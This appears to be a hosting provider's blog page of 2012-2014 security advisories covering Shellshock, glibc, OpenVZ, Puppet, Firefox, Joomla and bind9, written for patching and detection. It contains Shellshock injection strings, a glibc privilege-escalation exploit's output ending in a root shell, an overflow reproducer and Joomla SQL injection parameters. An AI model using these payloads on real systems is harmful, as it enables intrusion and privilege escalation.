Blog Page

How to scan access_log for Shellshock attempts via httpd

In the previous post, we announced the discovery of the remote bash vulnerability which has been dubbed “Shellshock” throughout the security and Linux communities.

As you may know, bash supports exporting shell variables as well as shell functions to other bash instances. This is accomplished through the process environment to a child process.

We previously reported that one of the major attack vectors that have been identified in this case was HTTP requests and CGI scripts. Nearly a week later, we’re seeing (on our own servers) attempts at exploiting this vulnerability via apache/httpd, and here’s how you can check your own access_logs to see if you’ve been targeted.

NOTE: IF YOU ARE NOT UPDATED/PATCHED YOUR BASH YET, YOU SHOULD SKIP THIS POST AND DO THIS IMMEDIATELY.

Inside a directory containing your access_log file(s):

find . \( -name '*access_log*' -o -name '*access_log*' \) -execdir \
grep --color=always -HE '\(.*\).*\{.*\}.*"' {} +

Example output showing attempts to exploit via httpd:

./access_log:37.128.189.183 – – [02/Oct/2014:14:39:14 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:37.128.189.183 – – [02/Oct/2014:14:39:14 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:95.211.131.148 – – [02/Oct/2014:14:39:22 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:95.211.131.148 – – [02/Oct/2014:14:39:22 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:209.11.159.26 – – [02/Oct/2014:23:45:48 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:209.11.159.26 – – [02/Oct/2014:23:45:48 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:177.87.80.17 – – [03/Oct/2014:03:00:20 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228
./access_log:177.87.80.17 – – [03/Oct/2014:03:00:20 -0700] “GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0″ 403 228

Remote vulnerability in bash – patches available for CVE-2014-6271, CVE-2014-7169

Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)

A remotely exploitable vulnerability was discovered and disclosed publicly today by Stephane Chazelas, and it is extremely unpleasant. The vulnerability has the CVE identifier CVE-2014-6271.

As you may know, bash supports exporting shell variables as well as shell functions to other bash instances. This is accomplished through the process environment to a child process.

The major attack vectors that have been identified in this case are:

  • HTTP requests and CGI scripts
  • OpenSSH using the SSH_ORIGINAL_COMMAND setting
  • Various daemons and SUID/privileged programs
  • Any other application using bash as the interpreter

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

We will continue to monitor the situation very closely. We expect proof of concept (PoC) exploits to be authored and distributed over the next few days. There is also the potential for variants of the original vulnerability, which may require further patching if other attack vectors or methods are found.

If you have any servers connected to the internet with bash installed, it is strongly recommended that you update bash. Many Linux distributions have already released a patched bash package into their repositories.



Sources:
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html
​https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
​http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html
http://linux.slashdot.org/story/14/09/24/1638207/remote-exploit-vulnerability-found-in-bash
​http://seclists.org/oss-sec/2014/q3/651



Update: 9/25/2014 4:00PM EDT

We have become aware that the patch for CVE-2014-6271 is incomplete. An attacker can still provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. See also Resolution for Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271) in Red Hat Enterprise Linux. RedHat and CentOS are working on patches in conjunction with the upstream developers as a critical priority.

Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271, and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.



Update: 9/26/2014 10:00AM EDT

We have obtained patches for CVE-2014-7169 and we strongly advise everyone update their systems immediately!

Download patches

glibc arbitrary code execution vulnerability (CVE-2014-0475 and CVE-2014-5119)

Two new vulnerabilities deemed as Important severity have been discovered and patched in glibc libraries.

In order for updates to take effect, a service restart for all daemons with a glibc dependency must occur. This includes, but is not limited to: Apache, MySQL Mail S
ervices, SSH, etc.

=====================================================================
Red Hat Security Advisory

Synopsis: Important: glibc security update
Advisory ID: RHSA-2014:1118-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1118.html
Issue date: 2014-09-02
CVE Names: CVE-2014-5119
=====================================================================

1. Summary:

Updated glibc packages that fix one security issue are now available for
Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9
Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update
Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AUS (v. 6.2 server) – x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) – x86_64
Red Hat Enterprise Linux EUS (v. 5.9 server) – i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux HPC Node EUS (v. 6.4) – x86_64
Red Hat Enterprise Linux LL (v. 5.6 server) – i386, ia64, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.4) – i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional AUS (v. 6.2) – x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.4) – i386, ppc64, s390x, x86_64

3. Description:

The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system cannot
function properly.

An off-by-one heap-based buffer overflow flaw was found in glibc’s internal
__gconv_translit_find() function. An attacker able to make an application
call the iconv_open() function with a specially crafted argument could
possibly use this flaw to execute arbitrary code with the privileges of
that application. (CVE-2014-5119)

All glibc users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1119128 – CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()

6. Package List:

Red Hat Enterprise Linux LL (v. 5.6 server):

Source:
glibc-2.5-58.el5_6.5.src.rpm

i386:
glibc-2.5-58.el5_6.5.i386.rpm
glibc-2.5-58.el5_6.5.i686.rpm
glibc-common-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-headers-2.5-58.el5_6.5.i386.rpm
glibc-utils-2.5-58.el5_6.5.i386.rpm
nscd-2.5-58.el5_6.5.i386.rpm

ia64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.ia64.rpm
glibc-common-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.ia64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.ia64.rpm
glibc-headers-2.5-58.el5_6.5.ia64.rpm
glibc-utils-2.5-58.el5_6.5.ia64.rpm
nscd-2.5-58.el5_6.5.ia64.rpm

x86_64:
glibc-2.5-58.el5_6.5.i686.rpm
glibc-2.5-58.el5_6.5.x86_64.rpm
glibc-common-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-2.5-58.el5_6.5.i386.rpm
glibc-debuginfo-2.5-58.el5_6.5.i686.rpm
glibc-debuginfo-2.5-58.el5_6.5.x86_64.rpm
glibc-debuginfo-common-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.i386.rpm
glibc-devel-2.5-58.el5_6.5.x86_64.rpm
glibc-headers-2.5-58.el5_6.5.x86_64.rpm
glibc-utils-2.5-58.el5_6.5.x86_64.rpm
nscd-2.5-58.el5_6.5.x86_64.rpm

Red Hat Enterprise Linux EUS (v. 5.9 server):

Source:
glibc-2.5-107.el5_9.7.src.rpm

i386:
glibc-2.5-107.el5_9.7.i386.rpm
glibc-2.5-107.el5_9.7.i686.rpm
glibc-common-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-headers-2.5-107.el5_9.7.i386.rpm
glibc-utils-2.5-107.el5_9.7.i386.rpm
nscd-2.5-107.el5_9.7.i386.rpm

ia64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.ia64.rpm
glibc-common-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.ia64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.ia64.rpm
glibc-headers-2.5-107.el5_9.7.ia64.rpm
glibc-utils-2.5-107.el5_9.7.ia64.rpm
nscd-2.5-107.el5_9.7.ia64.rpm

ppc:
glibc-2.5-107.el5_9.7.ppc.rpm
glibc-2.5-107.el5_9.7.ppc64.rpm
glibc-common-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc.rpm
glibc-debuginfo-2.5-107.el5_9.7.ppc64.rpm
glibc-devel-2.5-107.el5_9.7.ppc.rpm
glibc-devel-2.5-107.el5_9.7.ppc64.rpm
glibc-headers-2.5-107.el5_9.7.ppc.rpm
glibc-utils-2.5-107.el5_9.7.ppc.rpm
nscd-2.5-107.el5_9.7.ppc.rpm

s390x:
glibc-2.5-107.el5_9.7.s390.rpm
glibc-2.5-107.el5_9.7.s390x.rpm
glibc-common-2.5-107.el5_9.7.s390x.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390.rpm
glibc-debuginfo-2.5-107.el5_9.7.s390x.rpm
glibc-devel-2.5-107.el5_9.7.s390.rpm
glibc-devel-2.5-107.el5_9.7.s390x.rpm
glibc-headers-2.5-107.el5_9.7.s390x.rpm
glibc-utils-2.5-107.el5_9.7.s390x.rpm
nscd-2.5-107.el5_9.7.s390x.rpm

x86_64:
glibc-2.5-107.el5_9.7.i686.rpm
glibc-2.5-107.el5_9.7.x86_64.rpm
glibc-common-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-2.5-107.el5_9.7.i386.rpm
glibc-debuginfo-2.5-107.el5_9.7.i686.rpm
glibc-debuginfo-2.5-107.el5_9.7.x86_64.rpm
glibc-debuginfo-common-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.i386.rpm
glibc-devel-2.5-107.el5_9.7.x86_64.rpm
glibc-headers-2.5-107.el5_9.7.x86_64.rpm
glibc-utils-2.5-107.el5_9.7.x86_64.rpm
nscd-2.5-107.el5_9.7.x86_64.rpm

Red Hat Enterprise Linux HPC Node EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux AUS (v. 6.2 server):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-2.12-1.47.el6_2.13.i686.rpm
glibc-2.12-1.47.el6_2.13.x86_64.rpm
glibc-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-devel-2.12-1.47.el6_2.13.i686.rpm
glibc-devel-2.12-1.47.el6_2.13.x86_64.rpm
glibc-headers-2.12-1.47.el6_2.13.x86_64.rpm
glibc-utils-2.12-1.47.el6_2.13.x86_64.rpm
nscd-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-headers-2.12-1.107.el6_4.6.i686.rpm
glibc-utils-2.12-1.107.el6_4.6.i686.rpm
nscd-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-2.12-1.107.el6_4.6.ppc.rpm
glibc-2.12-1.107.el6_4.6.ppc64.rpm
glibc-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc.rpm
glibc-devel-2.12-1.107.el6_4.6.ppc64.rpm
glibc-headers-2.12-1.107.el6_4.6.ppc64.rpm
glibc-utils-2.12-1.107.el6_4.6.ppc64.rpm
nscd-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-2.12-1.107.el6_4.6.s390.rpm
glibc-2.12-1.107.el6_4.6.s390x.rpm
glibc-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-devel-2.12-1.107.el6_4.6.s390.rpm
glibc-devel-2.12-1.107.el6_4.6.s390x.rpm
glibc-headers-2.12-1.107.el6_4.6.s390x.rpm
glibc-utils-2.12-1.107.el6_4.6.s390x.rpm
nscd-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-2.12-1.107.el6_4.6.i686.rpm
glibc-2.12-1.107.el6_4.6.x86_64.rpm
glibc-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-devel-2.12-1.107.el6_4.6.i686.rpm
glibc-devel-2.12-1.107.el6_4.6.x86_64.rpm
glibc-headers-2.12-1.107.el6_4.6.x86_64.rpm
glibc-utils-2.12-1.107.el6_4.6.x86_64.rpm
nscd-2.12-1.107.el6_4.6.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 6.2):

Source:
glibc-2.12-1.47.el6_2.13.src.rpm

x86_64:
glibc-debuginfo-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-2.12-1.47.el6_2.13.x86_64.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.i686.rpm
glibc-debuginfo-common-2.12-1.47.el6_2.13.x86_64.rpm
glibc-static-2.12-1.47.el6_2.13.i686.rpm
glibc-static-2.12-1.47.el6_2.13.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 6.4):

Source:
glibc-2.12-1.107.el6_4.6.src.rpm

i386:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm

ppc64:
glibc-debuginfo-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.ppc64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.ppc64.rpm
glibc-static-2.12-1.107.el6_4.6.ppc.rpm
glibc-static-2.12-1.107.el6_4.6.ppc64.rpm

s390x:
glibc-debuginfo-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.s390x.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.s390x.rpm
glibc-static-2.12-1.107.el6_4.6.s390.rpm
glibc-static-2.12-1.107.el6_4.6.s390x.rpm

x86_64:
glibc-debuginfo-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-2.12-1.107.el6_4.6.x86_64.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.i686.rpm
glibc-debuginfo-common-2.12-1.107.el6_4.6.x86_64.rpm
glibc-static-2.12-1.107.el6_4.6.i686.rpm
glibc-static-2.12-1.107.el6_4.6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from

https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2014-5119.html

https://access.redhat.com/security/updates/classification/#important

https://access.redhat.com/solutions/1176253

CVE-2014-5119 glibc __gconv_translit_find() exploit

Date: Mon, 25 Aug 2014 19:00:15 -0700
From: Tavis Ormandy
To: fulldisclosure@…lists.org, oss-security@…ts.openwall.com
Subject: CVE-2014-5119 glibc __gconv_translit_find() exploit

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we’re publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@...alhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pkexploit.c -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl pty.c -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@...alhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

SimFS (VZ / OpenVZ) Security Vulnerability #PSBM-27641, #CVE-2014-3519

***UPDATE IMMEDIATELY – Vulnerability in simfs virtual filesystem***

A critical vulnerability in the legacy simfs Container filesystem was fixed. This affects OpenVZ and Parallels Virtuozzo Containers based on vzfs.

Note: ploop filesystems were not affected.

References:

http://www.webhostingtalk.com/showpo…0&postcount=38

https://openvz.org/Download/kernel/rhel6/042stab090.5

http://kb.parallels.com/en/122142

CVE-2013-4969: Puppet Vulnerability

Description

Puppet uses temp files unsafely by looking for a name it can use in a
directory, and then later writing to that file, creating a
vulnerability in which an attacker could make the name a symlink to
another file and thereby cause the puppet agent to overwrite something
that it did not intend to.

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969

http://www.ubuntu.com/usn/usn-2077-1

Several Vulnerabilities in Mozilla Firefox, Thunderbird, Seamonkey



Updated software packages for Mozilla Firefox, Thunderbird, Seamonkey that fixes several recently discovered security issues is now available for nearly all operating systems and platforms.

You should upgrade your software immediately!




Patched and Secure Versions
If you are not using one of the versions below, you are vulnerable.

Firefox 18.0
Firefox ESR 10.0.12
Firefox ESR 17.0.2
Thunderbird 17.0.2
Thunderbird ESR 10.0.12
Thunderbird ESR 17.0.2
SeaMonkey 2.15





Related MFSAs

MFSA 2013-20
Mis-issued TURKTRUST certificates

MFSA 2013-19
Use-after-free in Javascript Proxy objects

MFSA 2013-18
Use-after-free in Vibrate

MFSA 2013-17
Use-after-free in ListenerManager

MFSA 2013-16
Use-after-free in serializeToStream

MFSA 2013-15
Privilege escalation through plugin objects

MFSA 2013-14
Chrome Object Wrapper (COW) bypass through changing prototype

MFSA 2013-13
Memory corruption in XBL with XML bindings containing SVG

MFSA 2013-12
Buffer overflow in Javascript string concatenation

MFSA 2013-11
Address space layout leaked in XBL objects

MFSA 2013-10
Event manipulation in plugin handler to bypass same-origin policy

MFSA 2013-09
Compartment mismatch with quickstubs returned values

MFSA 2013-08
AutoWrapperChanger fails to keep objects alive during garbage collection

MFSA 2013-07
Crash due to handling of SSL on threads

MFSA 2013-05
Use-after-free when displaying table with many columns and column groups

MFSA 2013-04
URL spoofing in addressbar during page loads

MFSA 2013-03
Buffer Overflow in Canvas

MFSA 2013-02
Use-after-free and buffer overflow issues found using Address Sanitizer

MFSA 2013-01
Miscellaneous memory safety hazards (rv:18.0/ rv:10.0.12 / rv:17.0.2)

MFSA 2012-98
Firefox installer DLL hijacking




Related CVEs:

91811 – CVE-2013-0769 Mozilla: Miscellaneous memory safety hazards (rv:10.0.12) (MFSA 2013-01)
891821 – CVE-2013-0762 CVE-2013-0766 CVE-2013-0767 Mozilla: Use-after-free & buffer overflow w/Address Sanitizer (MFSA 2013-02)
891824 – CVE-2013-0759 Mozilla: URL spoofing in addressbar during page loads (MFSA 2013-04)
891825 – CVE-2013-0744 Mozilla: Use-after-free when displaying table with many columns and column groups (MFSA 2013-05)
892142 – CVE-2013-0746 Mozilla: Compartment mismatch with quickstubs returned values (MFSA 2013-09)
892144 – CVE-2013-0748 Mozilla: Address space layout leaked in XBL objects (MFSA 2013-11)
892145 – CVE-2013-0750 Mozilla: Buffer overflow in Javascript string concatenation (MFSA 2013-12)
892148 – CVE-2013-0758 Mozilla: Chrome Object Wrapper (COW) bypass through plugin objects (MFSA 2013-15)
892149 – CVE-2013-0753 Mozilla: Use-after-free in serializeToStream (MFSA 2013-16)
892150 – CVE-2013-0754 Mozilla: Use-after-free in ListenerManager (MFSA 2013-17)




References:
http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://rhn.redhat.com/errata/RHSA-2013-0144.html
https://rhn.redhat.com/errata/RHSA-2013-0145.html

CVE-2012-3480: glibc overflow vulnerability

This issue affects the versions of the glibc package, as shipped with RHEL 5 and 6 and Fedora 16, 17.

Note: this was just reported and an official patch from RHEL is not yet available.

Vulnerability details

multiple integer overflows, leading to stack-based buffer overflows were found in various stdlib functions of GNU libc (strtod, strtof, strtold, strtod_l and related routines). If an application, using the affected stdlib functions, did not perform user-level sanitization of provided inputs, a local attacker could use this flaw to cause such an application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.

* Upstream bug report:
[1] http://sourceware.org/bugzilla/show_bug.cgi?id=14459

* Upstream patch (might not be the final one):
[2] http://sourceware.org/ml/libc-alpha/2012-08/msg00202.html

* References:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=847715

Sample reproducer from upstream bug

#include
#include
#include

#define EXPONENT “e-2147483649″
#define SIZE 214748364

int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror (“malloc”);
exit (EXIT_FAILURE);
}
p[0] = ‘1’;
memset (p + 1, ‘0’, SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf (“%a\n”, d);
exit (EXIT_SUCCESS);
}

Reference: http://www.openwall.com/lists/oss-security/2012/08/13/4

2 Joomla SQL Injection Vulnerabilities Discovered

Two SQL Injection vulnerabilities were recently detected in the com_package and com_photo modules of the joomla Content Management System. Remote attackers & low privileged user accounts can execute/inject own sql commands to compromise the application database. The vulnerability is located in the com_package module with the bound vulnerable id parameter. Successful exploitation of the vulnerability result in database (Server) or application (Web) compromise.

com_package vulnerability:


Vulnerable Module(s):

  • index.php?option=com_package

Vulnerable Parameter(s):

  • id

com_photo vulnerability:

Vulnerable Module(s):

  • index.php?option=com_photo

Vulnerable Parameter(s):

  • AlbumId
  • key



Patching and Mitigation:

  • These exploits are in the early stages of discovery, and as such no vendor patches or fixes have been released at the present time. Updates will be posted when a patch or new release is available.

Proof of Concept:


The SQL Injection vulnerabilities can be exploited by remote attackers without privileged user account or required user inter action. For demonstration or reproduce …


Path: /
File: index.php
Module: ?option=com_package
Parameter: details&id=-1′[SQL Injection]–
URL: http://www.xxx.com/index.php?option=com_package&task=details&id=174-1′[SQL Injection]–

References:


http://www.vulnerability-lab.com/get_content.php?id=652
http://www.vulnerability-lab.com/get_content.php?id=654

bind9 denial of service (remote) (CVE-2012-3817)

Package : bind9
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3817

Einar Lonn discovered that under certain conditions bind9, a DNS server,
may use cached data before initialization. As a result, an attacker can
trigger and assertion failure on servers under high query load that do
DNSSEC validation.

We recommend that you upgrade your bind9 packages.